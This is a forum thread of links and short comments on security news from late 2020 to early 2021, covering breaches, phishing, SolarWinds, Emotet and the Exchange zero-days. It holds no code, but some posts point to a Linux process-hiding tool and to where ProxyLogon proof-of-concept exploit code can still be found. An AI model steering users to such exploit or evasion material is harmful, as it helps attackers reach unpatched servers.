https://www.bleepingcomputer.com/news/security/hmrc-smishing-tax-scam-targets-uk-banking-customers/
-
Critical Privilege Escalation Vulnerabilities Affect 100K Sites Using Ultimate Member Plugin
https://www.wordfence.com/blog/2020/11/critical-privilege-escalation-vulnerabilities-affect-100k-sites-using-ultimate-member-plugin/
-
Fraudulent Minecraft apps deceive millions of Google Play users
https://blog.avast.com/fraudulent-minecraft-apps-on-google-play-avast
https://press.avast.com/fraudulent-minecraft-related-apps-deceive-millions-of-google-play-users-avast-warns
-
5.8 million RedDoorz user records for sale on hacking forum
https://www.bleepingcomputer.com/news/security/58-million-reddoorz-user-records-for-sale-on-hacking-forum/
-
Animal Jam kids' virtual world hit by data breach, impacts 46M accounts
https://www.bleepingcomputer.com/news/security/animal-jam-kids-virtual-world-hit-by-data-breach-impacts-46m-accounts/
-
Report: Hotel Reservation Platform Leaves Millions of People Exposed in Massive Data Breach
https://www.websiteplanet.com/blog/prestige-soft-breach-report/
-
Avast Security News Roundup w/e 11-13-2020
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/11/13/14/24/cYXI2ZM7VD/preview.jpg) (https://youtu.be/_06fkM-HlvI)
https://youtu.be/_06fkM-HlvI
-
Hacker shares 3.2 million Pluto TV accounts for free on forum
https://www.bleepingcomputer.com/news/security/hacker-shares-32-million-pluto-tv-accounts-for-free-on-forum/
-
IRS Impersonation Payment Fraud
https://abnormalsecurity.com/blog/irs-impersonation-payment-fraud/
-
IRS Impersonation Payment Fraud
https://abnormalsecurity.com/blog/irs-impersonation-payment-fraud/ (https://abnormalsecurity.com/blog/irs-impersonation-payment-fraud/)
As old as the Nigerian scam. Unfortunately, both still filch victims out of a lot of money.
The IRS fraud uses fear. The Nigerian scam uses greed.
-
Large-Scale Attacks Target Epsilon Framework Themes
https://www.wordfence.com/blog/2020/11/large-scale-attacks-target-epsilon-framework-themes/
-
Large-Scale Attacks Target Epsilon Framework Themes
https://www.wordfence.com/blog/2020/11/large-scale-attacks-target-epsilon-framework-themes/ (https://www.wordfence.com/blog/2020/11/large-scale-attacks-target-epsilon-framework-themes/)
When you don't update, you're susceptible to old vulnerabilities.
-
Avast Security News Roundup w/e 11-20-2020
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/11/20/18/32/cYXYFxLu6a/preview.jpg) (https://youtu.be/3OeeGm9Dmic)
https://youtu.be/3OeeGm9Dmic (https://youtu.be/3OeeGm9Dmic)
-
Report: Spotify Targeted in Potential Fraud Scheme
https://www.vpnmentor.com/blog/report-spotify-scam/
-
Spoofed FBI Internet Domains Pose Cyber and Disinformation Risks
https://www.ic3.gov/Media/Y2020/PSA201123
-
Windows 7 and Server 2008 zero-day bug gets a free patch
https://www.bleepingcomputer.com/news/security/windows-7-and-server-2008-zero-day-bug-gets-a-free-patch/
-
Security News Roundup w/e 11/27/2020
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/11/27/15/38/cYXtoBLNZU/preview.jpg) (https://youtu.be/kxrjUEq__nw)
https://youtu.be/kxrjUEq__nw (https://youtu.be/kxrjUEq__nw)
-
GO SMS Pro Vulnerable to Media File Theft
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/go-sms-pro-vulnerable-to-media-file-theft/
-
Today is Computer Security Day
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/11/30/21/27/cYXvrtN1b4/preview.jpg)
Is your computer secure (https://nationaldaycalendar.com/computer-security-day-november-30/?fbclid=IwAR0mKv8fqf2o11LvqcLCehz5OeelD8SpOwAvdXF_5RFWAw8qa_PQAohf1XY)?
-
Alert (AA20-336A) - Advanced Persistent Threat Actors Targeting U.S. Think Tanks
https://us-cert.cisa.gov/ncas/alerts/aa20-336a
-
FBI: You may be a money mule and not even know it
https://www.bleepingcomputer.com/news/security/fbi-you-may-be-a-money-mule-and-not-even-know-it/
-
FireEye Shares Details of Recent Cyber Attack, Actions to Protect Community
https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html
-
Russian State-Sponsored Malicious Cyber Actors Exploit Known Vulnerability in Virtual Workspaces
https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2434988/russian-state-sponsored-malicious-cyber-actors-exploit-known-vulnerability-in-v/
https://media.defense.gov/2020/Dec/07/2002547071/-1/-1/0/CSA_VMWARE%20ACCESS_U_OO_195076_20.PDF
-
Insecure Communication in WinZip 24 Could Lead to Malware
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/insecure-communication-in-winzip-24-could-lead-to-malware/
-
Third Party Browser Extensions for Instagram, Facebook, Vimeo and Others Infected with Malware
https://press.avast.com/third-party-browser-extensions-from-instagram-facebook-vimeo-and-others-infected-with-malware
-
Be careful, the crooks are out there just waiting for you.
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/12/17/12/43/cYlbl58v2F/preview.jpg)
All the links lead to bitly shortened addresses waiting to steal your information.
There is no check. Trust nothing verify everything.
-
FBI, CISA officially confirm US govt hacks after SolarWinds breach
https://www.bleepingcomputer.com/news/security/fbi-cisa-officially-confirm-us-govt-hacks-after-solarwinds-breach/
SolarWinds hackers breach US nuclear weapons agency
https://www.bleepingcomputer.com/news/security/solarwinds-hackers-breach-us-nuclear-weapons-agency/
Microsoft confirms breach in SolarWinds hack, denies infecting others
https://www.bleepingcomputer.com/news/microsoft/microsoft-confirms-breach-in-solarwinds-hack-denies-infecting-others/
-
FBI, CISA officially confirm US govt hacks after SolarWinds breach
https://www.bleepingcomputer.com/news/security/fbi-cisa-officially-confirm-us-govt-hacks-after-solarwinds-breach/
SolarWinds hackers breach US nuclear weapons agency
https://www.bleepingcomputer.com/news/security/solarwinds-hackers-breach-us-nuclear-weapons-agency/
Microsoft confirms breach in SolarWinds hack, denies infecting others
https://www.bleepingcomputer.com/news/microsoft/microsoft-confirms-breach-in-solarwinds-hack-denies-infecting-others/
Alert (AA20-352A) - Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations
https://us-cert.cisa.gov/ncas/alerts/aa20-352a
https://us-cert.cisa.gov/sites/default/files/publications/AA20-352A-APT_Compromise_of_Government_Agencies%2C_Critical%20Infrastructure%2C_and_Private_Sector_Organizations.pdf
-
Weekly Security News Roundup w/e 12-18-2020
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/12/18/17/55/cYlFbN8zns/preview.jpg) (https://youtu.be/BgD8oTAOtWU)
https://youtu.be/BgD8oTAOtWU (https://youtu.be/BgD8oTAOtWU)
This was a very busy (bad) week.
-
FBI, CISA officially confirm US govt hacks after SolarWinds breach
https://www.bleepingcomputer.com/news/security/fbi-cisa-officially-confirm-us-govt-hacks-after-solarwinds-breach/
SolarWinds hackers breach US nuclear weapons agency
https://www.bleepingcomputer.com/news/security/solarwinds-hackers-breach-us-nuclear-weapons-agency/
Microsoft confirms breach in SolarWinds hack, denies infecting others
https://www.bleepingcomputer.com/news/microsoft/microsoft-confirms-breach-in-solarwinds-hack-denies-infecting-others/
Alert (AA20-352A) - Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations
https://us-cert.cisa.gov/ncas/alerts/aa20-352a
https://us-cert.cisa.gov/sites/default/files/publications/AA20-352A-APT_Compromise_of_Government_Agencies%2C_Critical%20Infrastructure%2C_and_Private_Sector_Organizations.pdf
Quite possibly tip of the 'Iceberg'
-
FBI, CISA officially confirm US govt hacks after SolarWinds breach
https://www.bleepingcomputer.com/news/security/fbi-cisa-officially-confirm-us-govt-hacks-after-solarwinds-breach/
SolarWinds hackers breach US nuclear weapons agency
https://www.bleepingcomputer.com/news/security/solarwinds-hackers-breach-us-nuclear-weapons-agency/
Microsoft confirms breach in SolarWinds hack, denies infecting others
https://www.bleepingcomputer.com/news/microsoft/microsoft-confirms-breach-in-solarwinds-hack-denies-infecting-others/
Alert (AA20-352A) - Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations
https://us-cert.cisa.gov/ncas/alerts/aa20-352a
https://us-cert.cisa.gov/sites/default/files/publications/AA20-352A-APT_Compromise_of_Government_Agencies%2C_Critical%20Infrastructure%2C_and_Private_Sector_Organizations.pdf
Quite possibly tip of the 'Iceberg'
Microsoft identifies 40+ victims of SolarWinds hack, 80% from US
https://www.bleepingcomputer.com/news/security/microsoft-identifies-40-plus-victims-of-solarwinds-hack-80-percent-from-us/
-
FBI, CISA officially confirm US govt hacks after SolarWinds breach
https://www.bleepingcomputer.com/news/security/fbi-cisa-officially-confirm-us-govt-hacks-after-solarwinds-breach/
SolarWinds hackers breach US nuclear weapons agency
https://www.bleepingcomputer.com/news/security/solarwinds-hackers-breach-us-nuclear-weapons-agency/
Microsoft confirms breach in SolarWinds hack, denies infecting others
https://www.bleepingcomputer.com/news/microsoft/microsoft-confirms-breach-in-solarwinds-hack-denies-infecting-others/
Alert (AA20-352A) - Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations
https://us-cert.cisa.gov/ncas/alerts/aa20-352a
https://us-cert.cisa.gov/sites/default/files/publications/AA20-352A-APT_Compromise_of_Government_Agencies%2C_Critical%20Infrastructure%2C_and_Private_Sector_Organizations.pdf
Quite possibly tip of the 'Iceberg'
Microsoft identifies 40+ victims of SolarWinds hack, 80% from US
https://www.bleepingcomputer.com/news/security/microsoft-identifies-40-plus-victims-of-solarwinds-hack-80-percent-from-us/
The SolarWinds cyberattack: The hack, the victims, and what we know
https://www.bleepingcomputer.com/news/security/the-solarwinds-cyberattack-the-hack-the-victims-and-what-we-know/
-
Solar winds hack related IP list: https://raw.githubusercontent.com/ExtraHop/code-examples/main/sunburst/threats.json
polonus
-
FBI, CISA officially confirm US govt hacks after SolarWinds breach
https://www.bleepingcomputer.com/news/security/fbi-cisa-officially-confirm-us-govt-hacks-after-solarwinds-breach/
SolarWinds hackers breach US nuclear weapons agency
https://www.bleepingcomputer.com/news/security/solarwinds-hackers-breach-us-nuclear-weapons-agency/
Microsoft confirms breach in SolarWinds hack, denies infecting others
https://www.bleepingcomputer.com/news/microsoft/microsoft-confirms-breach-in-solarwinds-hack-denies-infecting-others/
Alert (AA20-352A) - Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations
https://us-cert.cisa.gov/ncas/alerts/aa20-352a
https://us-cert.cisa.gov/sites/default/files/publications/AA20-352A-APT_Compromise_of_Government_Agencies%2C_Critical%20Infrastructure%2C_and_Private_Sector_Organizations.pdf
Quite possibly tip of the 'Iceberg'
Microsoft identifies 40+ victims of SolarWinds hack, 80% from US
https://www.bleepingcomputer.com/news/security/microsoft-identifies-40-plus-victims-of-solarwinds-hack-80-percent-from-us/
The SolarWinds cyberattack: The hack, the victims, and what we know
https://www.bleepingcomputer.com/news/security/the-solarwinds-cyberattack-the-hack-the-victims-and-what-we-know/
SolarWinds victims revealed after cracking the Sunburst malware DGA
https://www.bleepingcomputer.com/news/security/solarwinds-victims-revealed-after-cracking-the-sunburst-malware-dga/
-
Glomar response from FBI on accusations of secretly breaking into encryption.
Re: https://www.aclu.org/news/privacy-technology/the-fbi-is-secretly-breaking-into-encrypted-devices-were-suing/
What is a "glomar" response? Read: https://en.wikipedia.org/wiki/Glomar_response
In most cases a glomar responses often could be taken as being confirmative.
Others are also into this, like Europol with their decryption-platform.
polonus
-
Weekly Security News Roundup w/e 12-25-2020
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/12/27/23/07/cYlt0i8MkD/preview.jpg) (https://youtu.be/DjveRsce7uo)
https://youtu.be/DjveRsce7uo
-
T-Mobile data breach exposed phone numbers, call records
https://www.bleepingcomputer.com/news/security/t-mobile-data-breach-exposed-phone-numbers-call-records/
https://www.t-mobile.com/responsibility/consumer-info/security-incident
-
Data breach broker selling user records stolen from 26 companies
https://www.bleepingcomputer.com/news/security/data-breach-broker-selling-user-records-stolen-from-26-companies/
-
Security News Roundup w/e 1-1-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/01/02/19/23/crVnq0Pebm/preview.jpg) (https://youtu.be/_Q8a5DAFh34)
https://youtu.be/_Q8a5DAFh34
-
Beware: PayPal phishing texts state your account is 'limited'
https://www.bleepingcomputer.com/news/security/beware-paypal-phishing-texts-state-your-account-is-limited/
-
Hacker posts data of 10,000 American Express accounts for free
https://www.bleepingcomputer.com/news/security/hacker-posts-data-of-10-000-american-express-accounts-for-free/
-
WhatsApp: Share your data with Facebook or delete your account
https://www.bleepingcomputer.com/news/security/whatsapp-share-your-data-with-facebook-or-delete-your-account/
-
Weekly Security News Roundup w/e 1/8/2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/01/08/18/25/crVjFTPv5C/preview.jpg) (https://youtu.be/obD-fx4uBs8)
https://youtu.be/obD-fx4uBs8
-
Analysis Report (AR21-013A) - Strengthening Security Configurations to Defend Against Attackers Targeting Cloud Services
https://us-cert.cisa.gov/ncas/analysis-reports/ar21-013a
-
Weekly Security News Roundup w/e 1-15-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/01/15/14/38/crVo2B9nZL/preview.jpg) (https://youtu.be/lnYSNin0g1c)
https://youtu.be/lnYSNin0g1c (https://youtu.be/lnYSNin0g1c)
-
IObit forums hacked to spread ransomware to its members
https://www.bleepingcomputer.com/news/security/iobit-forums-hacked-to-spread-ransomware-to-its-members/
-
Investment fraud via dating apps
https://www.interpol.int/News-and-Events/News/2021/Investment-fraud-via-dating-apps
-
Hacker leaks full database of 77 million Nitro PDF user records
https://www.bleepingcomputer.com/news/security/hacker-leaks-full-database-of-77-million-nitro-pdf-user-records/
-
Avast Weekly Security News Roundup w/e 1-22-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/01/22/21/41/crV3rp9kZv/preview.jpg) (https://youtu.be/fTDs4tP_cdY)
https://youtu.be/fTDs4tP_cdY (https://youtu.be/fTDs4tP_cdY)
-
Bonobos clothing store suffers a data breach, hacker leaks 70GB database
https://www.bleepingcomputer.com/news/security/bonobos-clothing-store-suffers-a-data-breach-hacker-leaks-70gb-database/
-
Hacker posts 1.9 million Pixlr user records for free on forum
https://www.bleepingcomputer.com/news/security/hacker-posts-19-million-pixlr-user-records-for-free-on-forum/
-
IObit forums hacked to spread ransomware to its members
https://www.bleepingcomputer.com/news/security/iobit-forums-hacked-to-spread-ransomware-to-its-members/
Ransomware gang taunts IObit with repeated forum hacks
https://www.bleepingcomputer.com/news/security/ransomware-gang-taunts-iobit-with-repeated-forum-hacks/
-
IObit forums hacked to spread ransomware to its members
https://www.bleepingcomputer.com/news/security/iobit-forums-hacked-to-spread-ransomware-to-its-members/ (https://www.bleepingcomputer.com/news/security/iobit-forums-hacked-to-spread-ransomware-to-its-members/)
Ransomware gang taunts IObit with repeated forum hacks
https://www.bleepingcomputer.com/news/security/ransomware-gang-taunts-iobit-with-repeated-forum-hacks/ (https://www.bleepingcomputer.com/news/security/ransomware-gang-taunts-iobit-with-repeated-forum-hacks/)
So which forum is next? If they succeed there, all forums will be up for grabs.
Although this forum hasn't been hacked recently, we are seeing more and more spammers daily
which are causing a disruption to this forum.
-
L.S.
https://www.nationalcrimeagency.gov.uk/news/nca-in-international-takedown-of-notorious-malware-emotet
Ukranian police -> https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-ugrupovannya-xakeriv-u-rozpovsyudzhenni-najnebezpechnishogo-v-sviti-komp-yuternogo-virusu-EMOTET/
Good action, look at UrlHAUS website for reports about EMOTET malware. Re: https://urlhaus.abuse.ch/browse.php?search=emotet
polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
-
L.S.
https://www.nationalcrimeagency.gov.uk/news/nca-in-international-takedown-of-notorious-malware-emotet
Ukranian police -> https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-ugrupovannya-xakeriv-u-rozpovsyudzhenni-najnebezpechnishogo-v-sviti-komp-yuternogo-virusu-EMOTET/
Good action, look at UrlHAUS website for reports about EMOTET malware. Re: https://urlhaus.abuse.ch/browse.php?search=emotet
-> https://forum.avast.com/index.php?topic=66267.msg1581877#msg1581877
-
Weekly Security News Roundup w/e 1-29-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/01/29/16/49/crVUDdR2wp/preview.jpg) (https://youtu.be/dNBygnvqU2A)
https://youtu.be/dNBygnvqU2A
-
Perl.com domain stolen, now using IP address tied to malware
https://www.bleepingcomputer.com/news/security/perlcom-domain-stolen-now-using-ip-address-tied-to-malware/
-
See how bot malware (also like emotet malcode) uses open-source tools to evade detection.
Re: https://www.bleepingcomputer.com/news/security/linux-malware-uses-open-source-tool-to-evade-detection/
This tool is known as libprocesshider and is an open-source tool available on Github that can be used to hide any Linux process with the help of the ld preloader. Devious: http://web.archive.org/web/20201111214916/https://sysdig.com/blog/hiding-linux-processes-for-fun-and-profit/
Emotet-bot cleansing: 1. https://twitter.com/milkr3am/status/1354459859912192002
2. https://www.cplusplus.com/reference/ctime/tm/
Hard to imagine malware has better enterprise update schemes than common software often has. :o
polonus
-
Beware: Malicious Home Depot ad gets top spot in Google Search
https://www.bleepingcomputer.com/news/security/beware-malicious-home-depot-ad-gets-top-spot-in-google-search/
-
Beware: Malicious Home Depot ad gets top spot in Google Search
https://www.bleepingcomputer.com/news/security/beware-malicious-home-depot-ad-gets-top-spot-in-google-search/ (https://www.bleepingcomputer.com/news/security/beware-malicious-home-depot-ad-gets-top-spot-in-google-search/)
Top spot on Google search is based primarily on the money spent by the advertiser, not on the best answer to your search.
One should never assume that the top answer is ever the best answer.
-
Top spot on Google search is based primarily on the money spent by the advertiser
Source? Evidence?
-
Top spot on Google search is based primarily on the money spent by the advertiser
Source? Evidence?
Ask yourself how Google makes its revenue? That should be a good indication.
Also, re-read my statement, it merely stated that you should not depend on the top spot being the best or most reliable answer.
-
See:
https://support.google.com/google-ads/answer/1722087?hl=en
-
Scammers posing as FBI agents threaten targets with jail time
https://www.bleepingcomputer.com/news/security/scammers-posing-as-fbi-agents-threaten-targets-with-jail-time/
https://www.fbi.gov/contact-us/field-offices/jacksonville/news/press-releases/government-impersonators-targeting-north-florida-residents-1
-
Perl.com domain stolen, now using IP address tied to malware
https://www.bleepingcomputer.com/news/security/perlcom-domain-stolen-now-using-ip-address-tied-to-malware/
Hey @Asyn,
Sorry for being a few days late, but thanks for sharing this info about Perl. I use it for custom scripts on both Win 10 and Linux. The scripts are stable as is, but I'm going to need to update my Linux installation soon, which would probably persuade me to update Perl "everywhere", so I will now proceed with extra caution. Thank you! :)
-
Perl.com domain stolen, now using IP address tied to malware
https://www.bleepingcomputer.com/news/security/perlcom-domain-stolen-now-using-ip-address-tied-to-malware/
Hey @Asyn,
Sorry for being a few days late, but thanks for sharing this info about Perl. I use it for custom scripts on both Win 10 and Linux. The scripts are stable as is, but I'm going to need to update my Linux installation soon, which would probably persuade me to update Perl "everywhere", so I will now proceed with extra caution. Thank you! :)
You're welcome. :)
Edit: https://log.perl.org/2021/01/perlcom-hijacked.html
-
Recent root-giving Sudo bug also impacts macOS
https://www.zdnet.com/article/recent-root-giving-sudo-bug-also-impacts-macos/
-
Google fixes Chrome zero-day actively exploited in the wild
https://www.bleepingcomputer.com/news/security/google-fixes-chrome-zero-day-actively-exploited-in-the-wild/
-
Weekly Security News Roundup w/e 2-5-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/02/05/19/50/crnhqKRMZt/preview.jpg) (https://youtu.be/UrV3CIjcA6Q)
https://youtu.be/UrV3CIjcA6Q
-
The Great Suspender Chrome extension's fall from grace
https://www.bleepingcomputer.com/news/software/the-great-suspender-chrome-extensions-fall-from-grace/
-
Google looking into abandoning 3rd party cookies.
They think they've found a different way to keep track of your activities. :)
https://techxplore.com/news/2021-02-google-diet-cookies-track-users.html
-
Unpatched Vulnerability: 50,000 WP Sites Must Find Alternative for Contact Form 7 Style
https://www.wordfence.com/blog/2021/02/unpatched-vulnerability-50000-wp-sites-must-find-alternative-for-contact-form-7-style/
-
Another one -https://www.wordfence.com/blog/2021/02/severe-vulnerabilities-patched-in-nextgen-gallery-affect-over-800000-wordpress-sites/
Often plug-in code with Word Press php-based CMS is found to be not fully updated, patched, also often left (by developers).
New versions here were only installed by 27% of affected websites.
polonus
-
Microsoft urges customers to patch critical Windows TCP/IP bugs
https://www.bleepingcomputer.com/news/security/microsoft-urges-customers-to-patch-critical-windows-tcp-ip-bugs/
https://msrc-blog.microsoft.com/2021/02/09/multiple-security-updates-affecting-tcp-ip/
-
Weekly Security News Roundup w/e 2-12-2021
This week's edition differs from Avast's version.
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/02/12/15/09/crnloQST3J/preview.jpg) (https://youtu.be/8Fe3wNbTWao)
https://youtu.be/8Fe3wNbTWao
-
Yandex suffers data breach after sysadmin sold access to user emails
https://www.bleepingcomputer.com/news/security/yandex-suffers-data-breach-after-sysadmin-sold-access-to-user-emails/
https://yandex.com/company/press_center/press_releases/2021/2021-12-02
-
Yandex suffers data breach after sysadmin sold access to user emails
https://www.bleepingcomputer.com/news/security/yandex-suffers-data-breach-after-sysadmin-sold-access-to-user-emails/
https://yandex.com/company/press_center/press_releases/2021/2021-12-02
It amazes me that someone in that position would risk it all for some money, or stupid enough to think they could get away with it, potentially life ruined.
-
Yandex suffers data breach after sysadmin sold access to user emails
https://www.bleepingcomputer.com/news/security/yandex-suffers-data-breach-after-sysadmin-sold-access-to-user-emails/ (https://www.bleepingcomputer.com/news/security/yandex-suffers-data-breach-after-sysadmin-sold-access-to-user-emails/)
https://yandex.com/company/press_center/press_releases/2021/2021-12-02 (https://yandex.com/company/press_center/press_releases/2021/2021-12-02)
It amazes me that someone in that position would risk it all for some money, or stupid enough to think they could get away with it, potentially life ruined.
Yandex reminds me of Spandex, someone or something always seems to be pulling their strings and not in a good way.
Let's hope they bounce back.
-
Phishing scams - https://youtu.be/gD3o3RQHHBg
-
Phishing scams - https://youtu.be/gD3o3RQHHBg
;D 8)
-
Phishing scams - https://youtu.be/gD3o3RQHHBg (https://youtu.be/gD3o3RQHHBg)
;D 8)
I hope that gets the message across. Delivering that same message as a human seemed to have no effect. :)
-
Watch out for sextortion email scams
https://blog.avast.com/sextortion-email-scams-avast
-
US cities disclose data breaches after vendor's ransomware attack
https://www.bleepingcomputer.com/news/security/us-cities-disclose-data-breaches-after-vendors-ransomware-attack/
-
Brave privacy bug exposes Tor onion URLs to your DNS provider
https://www.bleepingcomputer.com/news/security/brave-privacy-bug-exposes-tor-onion-urls-to-your-dns-provider/
-
Brave privacy bug exposes Tor onion URLs to your DNS provider
https://www.bleepingcomputer.com/news/security/brave-privacy-bug-exposes-tor-onion-urls-to-your-dns-provider/ (https://www.bleepingcomputer.com/news/security/brave-privacy-bug-exposes-tor-onion-urls-to-your-dns-provider/)
Staying away from the Dark Web would also solve the problem. :)
-
Alert (AA21-055A) - Exploitation of Accellion File Transfer Appliance
https://us-cert.cisa.gov/ncas/alerts/aa21-055a
-
1Password has none, KeePass has none... So why are there seven embedded trackers in the LastPass Android app?
https://www.theregister.com/2021/02/25/lastpass_android_trackers_found/
-
Weekly Security News Roundup w/e 2-26-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/02/26/15/24/crnOoZWuYm/preview.jpg) (https://youtu.be/J9VYa6e6dIo)
https://youtu.be/J9VYa6e6dIo
-
T-Mobile discloses data breach after SIM swapping attacks
https://www.bleepingcomputer.com/news/security/t-mobile-discloses-data-breach-after-sim-swapping-attacks/
-
T-Mobile discloses data breach after SIM swapping attacks
https://www.bleepingcomputer.com/news/security/t-mobile-discloses-data-breach-after-sim-swapping-attacks/ (https://www.bleepingcomputer.com/news/security/t-mobile-discloses-data-breach-after-sim-swapping-attacks/)
Update February 27, 02:44 EST: The attackers used an internal T-Mobile application to target up to 400 customers in SIM swap attack attempts, BleepingComputer has learned. No T-Mobile for Business customers were impacted during this incident.
Headlines can and quite often can be very deceiving.
-
Beware: AOL phishing email states your account will be closed
https://www.bleepingcomputer.com/news/security/beware-aol-phishing-email-states-your-account-will-be-closed/
-
One of the biggest Android VPNs hacked? Data of 21 million users from 3 Android VPNs put for sale online
https://cybernews.com/security/one-of-the-biggest-android-vpns-hacked-data-of-21-million-users-from-3-android-vpns-put-for-sale-online/
-
Microsoft fixes actively exploited Exchange zero-day bugs, patch now
https://www.bleepingcomputer.com/news/security/microsoft-fixes-actively-exploited-exchange-zero-day-bugs-patch-now/
-
SITA data breach affects millions of travelers from major airlines
https://www.bleepingcomputer.com/news/security/sita-data-breach-affects-millions-of-travelers-from-major-airlines/
https://www.sita.aero/pressroom/news-releases/sita-statement-about-security-incident/
-
The latest Word Press plug-in zero-day was not detected by WordFence,
but as a result of reporting by Submitter: Ville Korhonen (Seravo), Antony Booker (WP Charged)
Submitter website: https://seravo.com/
Has been patched with 4.1.7 vof mentioned Plus Addons for Elementor plug-in.
polonus
-
Security News Roundup for the Week ending 3/12/2021
https://youtu.be/Hw2um5Q3jbA (https://youtu.be/Hw2um5Q3jbA)
-
15-year-old Linux kernel bugs let attackers gain root privileges
https://www.bleepingcomputer.com/news/security/15-year-old-linux-kernel-bugs-let-attackers-gain-root-privileges/
-
More information on the Google fix for a second actively exploited Chrome browser zero-day was not given,
as it comes marked as "RESERVED": https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-21193
We somehow know it is in their browser Webkit-engine, called Blink, specially positioned to harm Apple's webkit version's opposition.
What we can at least say, that it comes in the realm of the following category of bugs, a so-called "Use after Free" error-bug: https://cwe.mitre.org/data/definitions/416.html
More information is given as enough Google chrome users have been updating to the latest browser version,
and have been patched against this zero-day memory bug.
polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
-
Lector saluti,
Microsoft how dare you do this to the security community?
It now becomes clear why Microsoft acquired Github.
Reason for the removal of exploit code: Working security through obscurity and defending their interests dictatorially,
by deleting all info that they do not like to be made public. In this case that particular POC info,
during times of their Exchange server security drama.
Sign of the times? Is not this against the rules for responsible disclosure to the security community and beyond?
Re: https://arstechnica.com/gadgets/2021/03/critics-fume-after-github-removes-exploit-code-for-exchange-vulnerabilities/
Might not even been Microsoft that removed the Proxy-Logon POC code, but Github itself.
The info iand not gone (e.g. at preatorian dot com with diff between the original and patched code),
and still available on archived repositories, only direct links have been removed.
Again the discussion.
Should we protect users too lazy and irresponsible to patch thousands and thousands of such Exchange servers soon?
Some would certainly speak out for that.
polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
-
Lector saluti,
Microsoft how dare you do this to the security community?
It now becomes clear why Microsoft acquired Github.
Reason for the removal of exploit code: Working security through obscurity and defending their interests dictatorially,
by deleting all info that they do not like to be made public. In this case that particular POC info,
during times of their Exchange server security drama.
Sign of the times? Is not this against the rules for responsible disclosure to the security community and beyond?
Re: https://arstechnica.com/gadgets/2021/03/critics-fume-after-github-removes-exploit-code-for-exchange-vulnerabilities/ (https://arstechnica.com/gadgets/2021/03/critics-fume-after-github-removes-exploit-code-for-exchange-vulnerabilities/)
Might not even been Microsoft that removed the Proxy-Logon POC code, but Github itself.
The info iand not gone (e.g. at preatorian dot com with diff between the original and patched code),
and still available on archived repositories, only direct links have been removed.
Again the discussion.
Should we protect users too lazy and irresponsible to patch thousands and thousands of such Exchange servers soon?
Some would certainly speak out for that.
polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
A dissenting view
Marcus Hutchins, a security researcher at Kryptos Logic, pushed back on those critics. He said Github has indeed removed PoCs for patched vulnerabilities affecting non-Microsoft software. He also made a case for Github removing the Exchange exploit.
“I’ve seen Github remove malicious code before, and not just code targeted at Microsoft products,” he told me in a direct message. “I highly doubt MS played any role in the removal and it just simply fell afoul of Github’s ‘Active malware or exploits’ policy in the [terms of service], due to the exploit being extremely recent and the large number of servers at imminent risk of ransomware.”
Responding to Kennedy on Twitter, Hutchins added (https://twitter.com/MalwareTechBlog/status/1370098050186706950), "'Has already been patched.' Dude, there’s more than 50,000 unpatched exchange servers out there. Releasing a full ready to go RCE chain is not security research, it’s recklessness and stupid.”
-
Hi bob3160,
We are doing this to ourselves, by making use of "closed propriety source",
which cannot be gone over with scrutiny like with open source code.
Security through obscurity is the name of the game.
Mind you the Chinese now also sit on MAPP program exploits, and not only the services from the US of A.
Closed source, we have all confidence it it, and some prosper from it.
But alas as the POC info is already out on Interwebz, and once there, it won't go away,
A pity for monopolists. Re: https://www.praetorian.com/blog/reproducing-proxylogon-exploit/
Hope the POC-code will return there after all Exchange servers have been fully patched.
Certainly there should be room for "responsible disclosure" to check on what MS is up to.
polonus
-
Microsoft fixes actively exploited Exchange zero-day bugs, patch now
https://www.bleepingcomputer.com/news/security/microsoft-fixes-actively-exploited-exchange-zero-day-bugs-patch-now/
One-Click Microsoft Exchange On-Premises Mitigation Tool – March 2021
https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/
-
Security News Roundup w/e 3-19-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/03/23/11/30/cre0XvVV2ge/preview.jpg)
https://youtu.be/ypJWIzeKbfY (https://youtu.be/ypJWIzeKbfY)
-
Microsoft releases printer fix for older Windows Versions
https://www.bleepingcomputer.com/news/microsoft/microsoft-releases-printer-fix-for-older-windows-versions/
-
Cybercrime complaints are up, according to the FBI's latest report
https://blog.avast.com/fbi-internet-crime-report-avast
https://www.ic3.gov/Media/PDF/AnnualReport/2020_IC3Report.pdf
-
Apple fixes a iOS zero-day vulnerability actively used in attacks
https://www.bleepingcomputer.com/news/security/apple-fixes-a-ios-zero-day-vulnerability-actively-used-in-attacks/
https://support.apple.com/en-us/HT212256
-
PHP's Git server hacked to add backdoors to PHP source code
